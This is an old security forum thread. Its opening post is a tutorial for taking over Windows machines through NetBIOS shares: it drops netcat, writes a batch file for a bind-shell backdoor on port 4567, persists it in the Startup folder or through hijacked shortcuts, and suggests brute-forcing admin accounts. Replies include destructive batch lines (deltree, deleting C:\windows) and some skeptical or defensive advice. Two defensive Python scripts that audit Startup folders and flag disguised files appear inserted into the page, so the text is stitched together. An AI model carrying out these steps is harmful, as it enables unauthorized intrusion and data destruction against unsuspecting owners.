Security Forums

owning a computer through netbios (my tut)

andr3s
Just Arrived
Joined: 04 Jan 2003
Posts: 0

Posted: Mon Jan 20, 2003 3:29 am    Post subject: owning a computer through netbios (my tut)

thought i might give back to the forum..i wrote this today..

-----------------------------------------

Owning a computer through NetBios:

This text is for informational purposes only, so don't blame me for what anybody does with this information.

This is my sixth tutorial so far, I hope you enjoy it. Basically I'm going to cover how to get the most out of shitty NetBios access.

1- Go read some of the tutorials on using NetBios. And have some understanding of command prompt (read my batchfile tutorial). These are all available in the text section.

2- Go NetBios a computer.

3- Go into a random folder and drop a copy of netcat (available in the download section). If it says that you only have read access then go to problem 1 to see how to get read/write privileges.

4- You're gonna have to write a batch file. Go to notepad, then write something like this:

@echo off
cd C:\random_directory\ (doesn't have to be C:\, just whatever directory netcat is in")
nc -l -p 4567 | echo > cmd.exe (command.exe on anything less than NT)




5- If they have all of "C:\" shared (If they don't have C:\ shared go to problem 2 below) then simply go into "C:\Documents and Settings\" and click on the user name (if there are more than one, pick the one with most privileges or do this whole thing with each account). After you are in one of the user's folders click on the following folders "\Start Menu\Programs\Startup". By now the address of the folder you are in should be "C:\Documents and Settings\whatever_user_name\Start Menu\Programs\Startup". Now drop a copy of your batch file in there (read step 4).

6- Basically you just dropped a batch file that will make a backdoor in their computer in their startup folder. When their computer boots up it will be activated and your backdoor opened.

7- Run telnet and connect to their ip through port 4567.

---------------------------Problem 1-----------------------------------

1- That sucks. Well in that case you will have to enumerate the accounts (check the downloads section for programs that do this) and bruteforce the account with the highest privileges, root.

2- Log in as the admin and you'll have all the privileges.

---------------------------Problem 2-----------------------------------



1- This is where it gets harder. Drop your batchfile (read section 4 above) somewhere in their computer.

2- Find a shortcut or something that they're bound to use (i.e "warcraft 3") (if you can't find one go to problem 3). Now right-click on the shortcut and change the target input to the location of your batch file (i.e "D:\shared music\evil.bat") and the start in field to the folder where your batch file is (i.e "D:\shared music\").

3- When they click on this shortcut it will activate the batch file, the batch file will then activate the backdoor.

---------------------------Problem 3-----------------------------------



1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.
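
From the defending side, the persistence described in steps 4 to 6 (a batch file in a user's Startup folder that starts a netcat listener) is simple to audit for. The following is an added example, not part of andr3s's post: it walks every profile's Startup folder and reports script lines that start a listener. The function names and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Script types that Windows runs from a Startup folder at logon.
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".wsf"}
# netcat started with a listen flag (-l, -L, -lp ...).
LISTENER = re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b[^\r\n|&]*\s-\w*l", re.I)
PORT = re.compile(r"-\w*p\s*(\d{1,5})\b", re.I)


def audit_startup(profiles_root):
    """Return (user, script, line_no, port) for every listener line in a
    script under <profiles_root>/<user>/Start Menu/Programs/Startup."""
    findings = []
    pattern = "*/Start Menu/Programs/Startup"
    for startup in sorted(Path(profiles_root).glob(pattern)):
        user = startup.parents[2].name
        for script in sorted(startup.iterdir()):
            if not script.is_file() or script.suffix.lower() not in SCRIPT_EXTS:
                continue
            text = script.read_text(encoding="latin-1")
            for line_no, line in enumerate(text.splitlines(), 1):
                if LISTENER.search(line):
                    port = PORT.search(line)
                    findings.append((user, script.name, line_no,
                                     int(port.group(1)) if port else None))
    return findings


def build_sample(root):
    """Constructed sample: one benign logon script, one with the page's step 4 line."""
    samples = [
        ("alice", "mapdrives.bat", "@echo off\nnet use Z: \\\\fileserver\\share\n"),
        ("bob", "update.bat",
         "@echo off\ncd C:\\random_directory\\\nnc -l -p 4567 | echo > cmd.exe\n"),
    ]
    for user, name, body in samples:
        folder = Path(root) / user / "Start Menu" / "Programs" / "Startup"
        folder.mkdir(parents=True)
        (folder / name).write_text(body, encoding="latin-1")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding in audit_startup(tmp):
            print(finding)
```

Point `audit_startup` at a copy or mount of the profiles directory (for example `C:\Documents and Settings`); any hit should be followed up by checking what is listening on the reported port.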

ShaolinTiger
Forum Fanatic
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Posted: Mon Jan 20, 2003 11:48 pm    Post subject: Re: owning a computer through netbios (my tut)

andr3s wrote:

1- This is tricky stuff. Get a file binder and bind your batch file to a file that you know the user will open (i.e an mp3).

2- When he uses that mp3 your batch file will be run.


Yeh real tricky, even *I* don't know how to bind a batch file to an mp3.

Please explain.

I'm sure if this tutorial is really useful here as it's very basic and doesn't explain any of the more advanced concepts of null sessions or enumeration.

ToddK
Just Arrived
Joined: 29 Nov 2002
Posts: 0
Location: Ottawa, Canada

Posted: Tue Jan 21, 2003 1:58 am    Post subject:

Where are your other tutorials? It refers to them, but I can't find a link.

Also, I would like to know how that binding works. I can't think of a way. Does it need something specific installed or not patched?

ShaolinTiger
Forum Fanatic
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Posted: Tue Jan 21, 2003 11:36 am    Post subject:

ToddK wrote:

Also, I would like to know how that binding works. I can't think of a way. Does it need something specific installed or not patched?


He's talking arse, I just wanted to highlight that point though.

Madeline_13
Just Arrived
Joined: 10 Jan 2003
Posts: 0

Posted: Tue Jan 21, 2003 12:17 pm    Post subject:

hey someone sent me a rar file with a bat file in it - actually I haven't run it but I am wondering now if this file is infected. I ran a scan but you know I never trust that.

ShaolinTiger
Forum Fanatic
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Posted: Tue Jan 21, 2003 12:23 pm    Post subject:

LOL you don't need to scan .bat files, just open them and read them..

That's assuming it is a batch file not something else renamed .bat.

Madeline_13
Just Arrived
Joined: 10 Jan 2003
Posts: 0

Posted: Tue Jan 21, 2003 3:02 pm    Post subject:

that's what I meant. if it is something else like you just said...how could I know beforehand? bat file is supposed to be some files for a game ...and that kinda stuff is hard to trust

ShaolinTiger
Forum Fanatic
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Posted: Tue Jan 21, 2003 3:08 pm    Post subject:

.bat files are nothing to do with games. .bat files are batch files, a series of commands in a file.

Some cheesy warez rips use batch files to automate the extraction process.

If you don't trust it, open it and read it like I said, it's in plain text, it's just a series of commands like:

Code:
ECHO You are cl00less
deltree c:\*.* /s \y
ECHO You are f00ked.

ToddK
Just Arrived
Joined: 29 Nov 2002
Posts: 0
Location: Ottawa, Canada

Posted: Tue Jan 21, 2003 6:27 pm    Post subject:

Actually, this may be just a confusion. I have only just started reading about security, but I notice that many links mention "binding" to a program using the cgibin. Usually the cmd.exe to get a command prompt.

ShaolinTiger
Forum Fanatic
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Posted: Tue Jan 21, 2003 6:36 pm    Post subject:

That's binding to a port generally, or piping from one program to another or piping cmd.exe to netcat mostly..

You can bind an executable or dll to another executable (that's how trojan stubs work), but you can't bind an executable to a non executable.

You could in effect bind an exe to the default exe handler for Windows Explorer (this is what many viruses do) so everything you run, the virus/trojan runs as well.

This took me hours once to fix by hand.

You could also bind something to whatever plays mp3s, generally Winamp, so that whenever it runs the other thing runs too..

Or you can swap an mp3 for a bogus file with a double extension and a media icon..

But you can't bind a batch file to an mp3 (well you could, but the only thing that would happen is you would get some weird noises at the end of the song when you played the mp3).

Simple as that.
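
Two checks from this thread can be done before anyone opens a file: ShaolinTiger's earlier caveat that a `.bat` might be "something else renamed .bat", and the point above about a bogus file with a double extension. The following is an added example, not part of the original posts: it compares a file's name with its leading bytes. The function names, extension lists and sample inputs are constructed for illustration.

```python
import os

# Leading bytes of common formats that are not plain-text scripts.
MAGIC = [(b"MZ", "Windows executable"), (b"PK\x03\x04", "ZIP archive"),
         (b"Rar!", "RAR archive"), (b"ID3", "MP3 audio")]
SCRIPT_EXTS = {".bat", ".cmd"}
RUNNABLE_EXTS = SCRIPT_EXTS | {".exe", ".scr", ".pif", ".com", ".vbs"}
DECOY_EXTS = {".mp3", ".wav", ".avi", ".mpg", ".jpg", ".gif", ".txt", ".doc"}


def sniff(data):
    """Classify content from its first bytes."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    # NUL bytes do not occur in an ANSI batch file (a UTF-16 one would also trip this).
    return "unknown binary" if b"\x00" in data else "plain text"


def triage(name, data):
    """Return warnings for a file name and the first bytes of its content."""
    warnings = []
    kind = sniff(data)
    stem, ext = os.path.splitext(name.lower().rstrip())
    inner = os.path.splitext(stem.rstrip())[1]   # padding spaces may hide the real ext
    if ext in SCRIPT_EXTS and kind != "plain text":
        warnings.append(f"named {ext} but content is {kind}")
    if ext in RUNNABLE_EXTS and inner in DECOY_EXTS:
        warnings.append(f"double extension {inner}{ext}: Windows runs it, not plays it")
    if ext in DECOY_EXTS and kind == "Windows executable":
        warnings.append(f"named {ext} but content is {kind}")
    return warnings


# Constructed samples: (file name, first bytes of the file).
SAMPLES = [
    ("install.bat", b"@echo off\r\nunrar x part1.rar\r\n"),
    ("install.bat", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("track01.mp3      .exe", b"MZ\x90\x00\x03\x00\x00\x00"),
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(repr(name), "->", triage(name, data) or "nothing structural; now read it")
```

An empty result only means the name and content agree; a genuine batch file still has to be read line by line, as the thread advises.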

decypherohm
Just Arrived
Joined: 16 Nov 2002
Posts: 1
Location: World - Europe - Portugal - Lisbon

Posted: Tue Jan 21, 2003 8:14 pm    Post subject:

Easy and simply destrucktible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.

Tom Bair
SF Boss
Joined: 10 Aug 2002
Posts: 16776955
Location: Portland, Oregon USA

Posted: Tue Jan 21, 2003 8:52 pm    Post subject:

decypherohm wrote:
Easy and simply destrucktible .bat

Code:

@Echo Off
@Del c:\windows
@Echo You have just been erased.


Quickly, and just off the top of my head; I don't think your batch file would work. When issuing the Del command, does it not require a keypress of the Y key to continue?

Even with @Echo Off -- you will still receive a prompt of:

Do you wish to delete C:\Windows and all it's sub-directories?

At this point, the jig is up and the joke is on you. User hits "N" or the "ESC" key and sees You have just been erased..

Another trick to keep batch files from damaging your hard drive is to rename the FORMAT command to something else. Then when a batch file issues the ever popular FORMAT C:, a wonderful response from the OS is File not found.

Tom

Madeline_13
Just Arrived
Joined: 10 Jan 2003
Posts: 0

Posted: Thu Jan 23, 2003 9:02 am    Post subject:

download America's Army (your taxpayer dollars paid for it) after you dl all the parts there's a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. America's Army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. That's how the game is run. People are putting out hacks for it same style...dumb people run them. I was just asking about it here. I guess you gotta play a lot of games to really know what's going on though with what.

ShaolinTiger
Forum Fanatic
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Posted: Thu Jan 23, 2003 11:29 am    Post subject:

Madeline_13 wrote:
download America's Army (your taxpayer dollars paid for it) after you dl all the parts there's a bat you run...and it sets up the install.. People are using that to hack accounts left and right. also blackhawk down demo has the same thing. No warez...this is actual companies putting it out like this. America's Army is totally free forever to dl. I guess the army is "cheesy" then huh? they put it out. That's how the game is run. People are putting out hacks for it same style...dumb people run them. I was just asking about it here. I guess you gotta play a lot of games to really know what's going on though with what.


Well like I said open it and read it.

It's in plain text.

a) I don't live in the US (thank the lord)
b) I don't play demos
c) I play a lot of games
d) Don't run anything you don't trust 100%

All times are GMT + 2 Hours